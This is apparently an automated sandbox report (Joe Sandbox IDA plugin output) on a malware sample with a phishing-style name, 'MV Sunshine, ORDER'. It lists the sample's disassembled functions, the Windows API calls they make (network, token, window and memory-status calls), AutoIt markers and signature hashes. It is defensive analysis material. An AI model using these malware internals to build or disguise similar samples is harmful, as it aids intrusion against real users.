Part of subcall function 009812F3: SelectObject.GDI32(?,00000000), ref: 0098139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00A0C030
LineTo.GDI32(00000000,?,?), ref: 00A0C03D
EndPath.GDI32(00000000), ref: 00A0C04D
StrokePath.GDI32(00000000), ref: 00A0C05B

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 9cd944e53e632c654933f4d185dbf96b12ac0187aa50537069ffd7db91c14243
Instruction ID: 8275e29041171ff324b24132e2ce7b9d6df93d14b51e4b7a3fc61c800eb8fe8d
Opcode Fuzzy Hash: 9cd944e53e632c654933f4d185dbf96b12ac0187aa50537069ffd7db91c14243
Instruction Fuzzy Hash: 18F05E3600125DBBDB22AF94AC09FCE3F59AF16321F048110FA11614E287B55567DBD5

Function 009DA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 009DA399
GetWindowThreadProcessId.USER32(?,00000000), ref: 009DA3AC
GetCurrentThreadId.KERNEL32 ref: 009DA3B3
AttachThreadInput.USER32(00000000), ref: 009DA3BA

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 61e8e073c19c838ddfb49f45487044a9ec62cb686091f2c4360caf2696b39e85
Instruction ID: 73e8e44af70be1d11f9987a8ea6382359526fed44dd0b9c5e5aae0c0ec753c3d
Opcode Fuzzy Hash: 61e8e073c19c838ddfb49f45487044a9ec62cb686091f2c4360caf2696b39e85
Instruction Fuzzy Hash: 54E0393118136CBADB209BA2DC0CED7BF1DEF167A1F008025F608A4460CA76C552CBA0

Function 00982218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00982231
SetTextColor.GDI32(?,000000FF), ref: 0098223B
SetBkMode.GDI32(?,00000001), ref: 00982250
GetStockObject.GDI32(00000005), ref: 00982258
GetWindowDC.USER32(?,00000000), ref: 009BC0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 009BC0E0
GetPixel.GDI32(00000000,?,00000000), ref: 009BC0F9
GetPixel.GDI32(00000000,00000000,?), ref: 009BC112
GetPixel.GDI32(00000000,?,?), ref: 009BC132
ReleaseDC.USER32(?,00000000), ref: 009BC13D

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: bf8061f46f28787ecbbfd86b7de633a9a04856fe39ff17415f1b9ab67e3c5e94
Instruction ID: 1e47d6874a4edcf3c1e41e2db44e4680b593f74b55bd4214c438499d5c9c7c04
Opcode Fuzzy Hash: bf8061f46f28787ecbbfd86b7de633a9a04856fe39ff17415f1b9ab67e3c5e94
Instruction Fuzzy Hash: CAE03932104248EEDF219FA8EC0D7D83B14AB05332F008366FB69680E187714992DB11

Function 009D8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 009D8C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,009D882E), ref: 009D8C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009D882E), ref: 009D8C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,009D882E), ref: 009D8C7E

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 55d39ca1f2a4b20607fe4cd5b08764a8a52564bc8374b7faf3f4b7e82e532c30
Instruction ID: 57e1ada363d3d9d3d6a0143f795e2163140a9d05c95feba9a552bf4f38938e16
Opcode Fuzzy Hash: 55d39ca1f2a4b20607fe4cd5b08764a8a52564bc8374b7faf3f4b7e82e532c30
Instruction Fuzzy Hash: 29E04F36642215DFD7309FF06D0CB973BACAF54792F048828B685E9041EA3484438B61

Function 009C2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 009C2187
GetDC.USER32(00000000), ref: 009C2191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 009C21B1
ReleaseDC.USER32(?), ref: 009C21D2

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 1469d2ae8c8e5863c165fcff2978ee54a91b5cd415756da4142f8b9a8b10b35e
Instruction ID: 26ccacf7fe60bad078614e68f6b89918b4b6a804cb301d709c2b02d391d97070
Opcode Fuzzy Hash: 1469d2ae8c8e5863c165fcff2978ee54a91b5cd415756da4142f8b9a8b10b35e
Instruction Fuzzy Hash: 40E01AB5800608EFDB51EFA0C808BADBBF1EB4C350F108429F95AA7720DB3991439F40

Function 009C219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 009C219B
GetDC.USER32(00000000), ref: 009C21A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 009C21B1
ReleaseDC.USER32(?), ref: 009C21D2

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 20f8915f2c3d6ffa93c2d7a861d8ab13581d15d297eb10bd578648218f3e1030
Instruction ID: dbcff569e39f59dadb8202215eb4498e9644817a0502adbdf354d566e7eedf87
Opcode Fuzzy Hash: 20f8915f2c3d6ffa93c2d7a861d8ab13581d15d297eb10bd578648218f3e1030
Instruction Fuzzy Hash: 98E012B5800608AFCB61EFB0C8086ADBBF1EB4C310F108429F95AA7720DB3991439F40

Function 009DB7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 009DB981

Strings

AutoIt3GUI, xrefs: 009DB8F9
Container, xrefs: 009DB8FE

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 148cb914d0c6c743a8ac1e9e4a6578d18acd7ee55c01e2b80958cae3edbb0573
Instruction ID: c49d6186616de0c1f2112499a4aef1b11656427869deec48dad2ec5aa32609bf
Opcode Fuzzy Hash: 148cb914d0c6c743a8ac1e9e4a6578d18acd7ee55c01e2b80958cae3edbb0573
Instruction Fuzzy Hash: AB913874640601EFDB24DF68C894B6ABBE8BF49710F15856EF94ACB791DB70E840CB50

Function 009EB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0099FEC6: _wcscpy.LIBCMT ref: 0099FEE9

Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C

__wcsnicmp.LIBCMT ref: 009EB298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 009EB361

Strings

LPT, xrefs: 009EB292

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 5a39b7d73391f0595d04aef6d11b6f63580d8bad77f682e62257169b52e8ba40
Instruction ID: 73921f693b4f82ad379b2defbcfa55eff746002b08e0674ac2d062b3c4b5c266
Opcode Fuzzy Hash: 5a39b7d73391f0595d04aef6d11b6f63580d8bad77f682e62257169b52e8ba40
Instruction Fuzzy Hash: 67618375A00215EFCB15EF99C882FBEB7B8AF48310F15445AF556AB391DB70AE40CB90

Function 00992AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00992AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00992AE1

Strings

@, xrefs: 00992AD5

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: b0d2e129dee7e384838af2123e2fc2971bde92128cd2ae7cab376e528191efcd
Instruction ID: 1c193ddcea4f7e0436de37d9b4e571e84807d13b591b226402bbb0cc4b3a79ac
Opcode Fuzzy Hash: b0d2e129dee7e384838af2123e2fc2971bde92128cd2ae7cab376e528191efcd
Instruction Fuzzy Hash: C25157714187449BD320BF54D886BBBBBE8FBC4314F56885DF1DA911A1DB30852ACB26

Function 009E99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0098506B: __fread_nolock.LIBCMT ref: 00985089

_wcscmp.LIBCMT ref: 009E9AAE
_wcscmp.LIBCMT ref: 009E9AC1

Strings

FILE, xrefs: 009E99FA

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: b3d5f4a8b0b1ebc1c5b1484f8cf0afe2727979c6e43f83a6ea85eb028dc40cda
Instruction ID: 29505188531f0fda06bccc9ddd025738ed2d87eb6164463849d0dbf4af87ef37
Opcode Fuzzy Hash: b3d5f4a8b0b1ebc1c5b1484f8cf0afe2727979c6e43f83a6ea85eb028dc40cda
Instruction Fuzzy Hash: 3E411671A00609BADF21AEA5DC45FEFB7FDDF85710F010469B904E7281CA759E0487A1

Function 009F2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009F2892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009F28C8

Strings

|, xrefs: 009F2899

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 31fa5a4a03c0c63284cd2d844c58c4cec4a5976a66cb53fd2401c80e2da73f2c
Instruction ID: 8f08096f1fc6ef099c4d1ee38a0f799e6020d22e4fb4c7ce25470996dc101b13
Opcode Fuzzy Hash: 31fa5a4a03c0c63284cd2d844c58c4cec4a5976a66cb53fd2401c80e2da73f2c
Instruction Fuzzy Hash: D7313C71804119AFCF01EFA1CC85EEEBFB9FF48300F104029F915A6266DB319A56DBA0

Function 00A07CE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00A07DD0
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A07DE5

Strings

', xrefs: 00A07D39

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 6b48bf3437d999f0e7a969cff87e43ac2d3440d3500ddc42d51849356ce021b0
Instruction ID: d0d8e0928d3da0742028bd7558c3df6712d74c486b6883a1c32c3601d010d38f
Opcode Fuzzy Hash: 6b48bf3437d999f0e7a969cff87e43ac2d3440d3500ddc42d51849356ce021b0
Instruction Fuzzy Hash: B7411774E052099FDB10CF68E881BEE7BB5FF49300F10016AE905AB391D731A951CFA0

Function 00A06CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00A06D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A06DC2

Strings

static, xrefs: 00A06D22

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 536bcf374cb24a7355336aadc3825cfd36749b69ceff607f99647ac7ccc8588d
Instruction ID: 2b679705501c8e0f85f8462a7f0117c5096cab5ba5134fff1151d21c16178127
Opcode Fuzzy Hash: 536bcf374cb24a7355336aadc3825cfd36749b69ceff607f99647ac7ccc8588d
Instruction Fuzzy Hash: 2D316171210608AEEB10DF64DC80BFB77B9FF48764F148519F99597190DB31AC51DB60

Function 009E2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009E2E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009E2E3B

Strings

0, xrefs: 009E2DF9

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: baed5b43d3325ce92ce419ff6127643aad72a515e49167e9ef2c1c585178d7e1
Instruction ID: ac56504465c0ee0230e154d6c1f28875f2a788ce202c2e0a23edd5af7be4a4d6
Opcode Fuzzy Hash: baed5b43d3325ce92ce419ff6127643aad72a515e49167e9ef2c1c585178d7e1
Instruction Fuzzy Hash: BA310631600369EBEB26CF4ADC45BAEBBBDFF45350F14046DE985A61A0E7709D40CB50

Function 00A06943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A069D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A069DB

Strings

Combobox, xrefs: 00A0699D

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: e303030789c9ce033f140095e085a140149755d689a1c77596de30eed6982dbc
Instruction ID: 04a2b9fd7ec67c8e7363ad44dbe6ba409d36f86c25e1893ff788e5c9ea6e6ea5
Opcode Fuzzy Hash: e303030789c9ce033f140095e085a140149755d689a1c77596de30eed6982dbc
Instruction Fuzzy Hash: A711B27170020C6FEF119F54DC80FEB376AEB893A8F114124F958972D0D6719C6187A0

Function 00A06E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00981D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00981D73
Part of subcall function 00981D35: GetStockObject.GDI32(00000011), ref: 00981D87
Part of subcall function 00981D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00981D91

GetWindowRect.USER32(00000000,?), ref: 00A06EE0
GetSysColor.USER32(00000012), ref: 00A06EFA

Strings

static, xrefs: 00A06EBD

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: dff0d141108bec47b8b0057b813d10bdfd0bbfc4b7acb15d2f2e30f5ea6654a3
Instruction ID: 881a82bd7232d9232459909fc36a4de5e9d17556ca9cdb9364340366b930a77f
Opcode Fuzzy Hash: dff0d141108bec47b8b0057b813d10bdfd0bbfc4b7acb15d2f2e30f5ea6654a3
Instruction Fuzzy Hash: 91212C7651020EAFDB14DFA8DD45AEA7BB8FB08314F004529F955E3290D635E8619B50

Function 00A06B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00A06C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A06C20

Strings

edit, xrefs: 00A06BF5

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 5cfc465574c729fb0c0e17c1ce862177220616bf83282542d6015f9937bb1f41
Instruction ID: 8eb331c97afe0278d18866879dfb961e33932eaef06dc1d189b8c011b5547af1
Opcode Fuzzy Hash: 5cfc465574c729fb0c0e17c1ce862177220616bf83282542d6015f9937bb1f41
Instruction Fuzzy Hash: 10116AB154020CAFEB209F64AC45AAB3769EB06378F604724F961D71E0C775DCA29B60

Function 009E2E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009E2F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009E2F30

Strings

0, xrefs: 009E2F07

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 56aa3ad2001c1c16f99b4a2894284038c4af8e300202485b326aa720a3fc1a05
Instruction ID: 5b718c4515bb916ebb427249884cc733f47217889fd043c38e78e73ae33c40b1
Opcode Fuzzy Hash: 56aa3ad2001c1c16f99b4a2894284038c4af8e300202485b326aa720a3fc1a05
Instruction Fuzzy Hash: 711101359012A8ABDB26DB9ADC04BAD73BDEB42310F1804B5F844A72A0D7B0EE05C791

Function 009F24CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009F2520
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009F2549

Strings

<local>, xrefs: 009F2511

